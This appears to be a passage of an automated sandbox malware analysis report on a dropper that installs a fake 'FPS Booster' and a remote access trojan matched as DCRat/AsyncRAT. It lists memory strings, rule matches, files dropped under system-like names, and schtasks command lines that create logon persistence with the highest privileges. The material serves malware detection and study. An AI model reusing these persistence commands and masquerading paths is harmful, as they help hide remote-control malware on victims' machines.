                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe, 00000007.00000000.1351054556.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.sectigo.com0
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fps-booster.com/api/software/download?branch=master&bits=x64get
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpsbooster.ru/api/en/booster/install?is_agree=0https://fps-booster.com/api/software/download
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpsbooster.ru/api/en/booster/install?is_agree=1/NOCANCELpost
                    Source: WerFault.exe, 00000011.00000002.1426473572.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: explorer.exe.5.drString found in binary or memory: https://steamcommunity.com/profiles/
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/ru-ru
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004050F9
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1

System Summary

Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: DCRat payload Author: ditekSHen
Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: DCRat payload Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 7_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\SysWOW64\MsRdpWebAccess
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\SysWOW64\MsRdpWebAccess\ee201eac4591f0b16735de891f3d31be299085b8
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\regedit
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\regedit\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F3D268 0_2_00F3D268
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F33698 0_2_00F33698
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F3EE30 0_2_00F3EE30
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F32F60 0_2_00F32F60
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F3F1C2 0_2_00F3F1C2
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 0_2_00F3F2B6 0_2_00F3F2B6
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 5_2_00007FF887B30452 5_2_00007FF887B30452
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 5_2_00007FF887B2C898 5_2_00007FF887B2C898
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 5_2_00007FF887B2EFFA 5_2_00007FF887B2EFFA
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 5_2_00007FF887B2E81B 5_2_00007FF887B2E81B
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_0040737E 7_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_00406EFE 7_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_004079A2 7_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_004049A8 7_2_004049A8
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Code function: 23_2_00007FF887B250BA 23_2_00007FF887B250BA
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
Source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs UNFOT5F1qt.exe
Source: UNFOT5F1qt.exe, 00000000.00000002.1457006922.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAntiDump.dll2 vs UNFOT5F1qt.exe
Source: UNFOT5F1qt.exe, 00000000.00000002.1470247095.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAntiDump.dll2 vs UNFOT5F1qt.exe
Source: UNFOT5F1qt.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\regedit\explorer.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: UNFOT5F1qt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: classification engine | Classification label: mal100.troj.evad.winEXE@22/28@0/1
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 7_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_004024FB CoCreateInstance, 7_2_004024FB
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Code function: 2_2_0040135A GetSystemDirectoryA,PathAddBackslashA,GetWindowsDirectoryA,GetTempPathA,GetModuleFileNameA,GetEnvironmentVariableA,FindResourceA,SizeofResource,LoadResource,LockResource,GlobalAlloc,RtlMoveMemory,GlobalAlloc,RtlMoveMemory,GlobalFree,lstrcpynA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrcatA,lstrcpyA,CreateFileA,WriteFile,HeapAlloc,WriteFile,HeapFree,CreateFileA,GetFileSize,CloseHandle,HeapAlloc,WriteFile,HeapFree,CloseHandle,GlobalFree,SetFileAttributesA,lstrcpyA,PathFindFileNameA,ShellExecuteA,FreeResource,ExitProcess,ExitProcess, 2_2_0040135A
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | File created: C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
Source: C:\Windows\regedit\explorer.exe | Mutant created: NULL
Source: C:\Windows\regedit\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\aa121e4af995dea523d8190342698ff18efb3e55
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | File created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
Source: unknown | Process created: C:\Windows\regedit\explorer.exe
Source: unknown | Process created: C:\Windows\regedit\explorer.exe
Source: UNFOT5F1qt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UNFOT5F1qt.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UNFOT5F1qt.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | File read: C:\Users\user\Desktop\UNFOT5F1qt.exe
Source: unknown | Process created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
Source: unknown | Process created: C:\Windows\regedit\explorer.exe C:\Windows\regedit\explorer.exe
Source: unknown | Process created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
Source: unknown | Process created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
Source: unknown | Process created: C:\Windows\regedit\explorer.exe "C:\Windows\regedit\explorer.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe"
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Process created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Process created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: iertutil.dll
